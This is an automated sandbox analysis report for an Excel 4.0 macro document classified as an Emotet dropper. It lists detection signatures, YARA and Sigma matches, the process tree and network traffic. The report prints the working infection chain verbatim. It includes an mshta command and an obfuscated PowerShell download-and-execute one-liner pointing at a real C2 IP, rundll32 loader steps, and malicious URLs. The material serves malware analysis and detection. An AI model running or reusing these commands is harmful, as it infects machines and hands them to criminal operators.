Windows Analysis Report
imedpub.com_10.xls

Overview

General Information

Sample Name: imedpub.com_10.xls
Analysis ID: 562396
MD5: b7d1edc6031adb3dfb8b7a4489da9102
SHA1: fbb0c3649b1741de48c037cea19f088acad5c6a6
SHA256: 6a9dd96ee5aeaedd9045f2bd76b3bd8d7f7b42cc37c46ad076791e33b1bb2fdc
Tags: SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Searches for user specific document files
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Contains functionality to detect virtual machines (SLDT)
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs HTTP gets)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 152 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • cmd.exe (PID: 2792 cmdline: cmd /c mshta http://91.240.118.168/zzx/ccv/fe.html MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • mshta.exe (PID: 1176 cmdline: mshta http://91.240.118.168/zzx/ccv/fe.html MD5: 95828D670CFD3B16EE188168E083C3C5)
        • powershell.exe (PID: 2128 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
          • cmd.exe (PID: 2212 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
            • rundll32.exe (PID: 2416 cmdline: C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 1160 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2824 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qnjiyxnfa\jxnctwsmnhcex.tox",ZiXeiVCTiyE MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2940 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qnjiyxnfa\jxnctwsmnhcex.tox",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2844 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Eyummksnnunnmycc\yekquepksxa.zkh",lrHfvn MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 1180 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Eyummksnnunnmycc\yekquepksxa.zkh",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Source | Rule | Description | Author | Strings
imedpub.com_10.xls | SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x108a2:$s1: Excel
  • 0x11913:$s1: Excel
  • 0x481d:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
imedpub.com_10.xls | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security
imedpub.com_10.xls | INDICATOR_OLE_Excel4Macros_DL2 | Detects OLE Excel 4 Macros documents acting as downloaders | ditekSHen
  • 0x47a3:$e2: 00 4D 61 63 72 6F 31 85 00
  • 0x481d:$a1: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A 00
  • 0x946:$x1: * #,##0
  • 0x952:$x1: * #,##0
  • 0x9fb:$x1: * #,##0
  • 0xa0a:$x1: * #,##0
  • 0xa36:$x1: * #,##0

Source | Rule | Description | Author | Strings
C:\Users\user\Desktop\imedpub.com_10.xls | SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x108a2:$s1: Excel
  • 0x11913:$s1: Excel
  • 0x481d:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
C:\Users\user\Desktop\imedpub.com_10.xls | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security
C:\Users\user\Desktop\imedpub.com_10.xls | INDICATOR_OLE_Excel4Macros_DL2 | Detects OLE Excel 4 Macros documents acting as downloaders | ditekSHen
  • 0x47a3:$e2: 00 4D 61 63 72 6F 31 85 00
  • 0x481d:$a1: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A 00
  • 0x946:$x1: * #,##0
  • 0x952:$x1: * #,##0
  • 0x9fb:$x1: * #,##0
  • 0xa0a:$x1: * #,##0
  • 0xa36:$x1: * #,##0
C:\Users\Public\Documents\ssd.dll | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security

Source | Rule | Description | Author | Strings
0000000C.00000002.538615152.0000000002850000.00000040.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0000000B.00000002.496653771.0000000000331000.00000020.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0000000A.00000002.494317741.0000000002F11000.00000020.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0000000F.00000002.673473149.0000000002FC1000.00000020.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0000000F.00000002.672675374.0000000000CF1000.00000020.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security

Source | Rule | Description | Author | Strings
12.2.rundll32.exe.9c0000.4.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
15.2.rundll32.exe.2f90000.25.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
12.2.rundll32.exe.a20000.6.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
15.2.rundll32.exe.2b60000.13.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
15.2.rundll32.exe.2b60000.13.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security

                            System Summary

                            Source: File createdAuthor: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 1176, TargetFilename: C:\Users\user\AppData\Local
                            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/zzx/ccv/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1176, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit 
$c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 2128
                            Source: Process startedAuthor: Florian Roth: Data: Command: mshta http://91.240.118.168/zzx/ccv/fe.html, CommandLine: mshta http://91.240.118.168/zzx/ccv/fe.html, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: cmd /c mshta http://91.240.118.168/zzx/ccv/fe.html, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2792, ProcessCommandLine: mshta http://91.240.118.168/zzx/ccv/fe.html, ProcessId: 1176
                            Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: cmd /c mshta http://91.240.118.168/zzx/ccv/fe.html, CommandLine: cmd /c mshta http://91.240.118.168/zzx/ccv/fe.html, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 152, ProcessCommandLine: cmd /c mshta http://91.240.118.168/zzx/ccv/fe.html, ProcessId: 2792
                            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/zzx/ccv/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1176, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit 
$c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 2128
                            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/zzx/ccv/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1176, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit 
$c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 2128
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/zzx/ccv/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1176, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit 
$c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zzx/ccv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 2128

                            AV Detection

                            Source: 15.2.rundll32.exe.300000.2.raw.unpack | Malware Configuration Extractor: Emotet
                            Source: imedpub.com_10.xls | ReversingLabs: Detection: 30%
                            Source: www.yeald.finance | Virustotal: Detection: 8%
                            Source: https://palankhir.hu/tools/GJRNhZHz/ | Virustotal: Detection: 11%
                            Source: C:\Users\Public\Documents\ssd.dll | Joe Sandbox ML: detected
                            Source: unknown | HTTPS traffic detected: 94.130.116.76:443 -> 192.168.2.22:49167 version: TLS 1.0
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                            Source: Binary string: ;.PDB source: powershell.exe, 00000006.00000002.672109254.000000000027A000.00000004.00000020.00020000.00000000.sdmp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,9_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,11_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 15_2_002D7E00 FindFirstFileW,15_2_002D7E00

                            Software Vulnerabilities

                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
                            Source: global traffic TCP traffic: 192.168.2.22:49165 -> 91.240.118.168:80
                            Source: global traffic DNS query: name: www.yeald.finance
                            Source: global traffic TCP traffic: 192.168.2.22:49167 -> 94.130.116.76:443

                            Networking

                            Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49166 -> 91.240.118.168:80
                            Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 160.16.102.168 80
                            Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                            Source: global traffic HTTP traffic detected: GET /wp-admin/1WgPRm/ HTTP/1.1 Host: www.yeald.finance Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: GET /zzx/ccv/fe.png HTTP/1.1 Host: 91.240.118.168 Connection: Keep-Alive
                            Source: unknown HTTPS traffic detected: 94.130.116.76:443 -> 192.168.2.22:49167 version: TLS 1.0
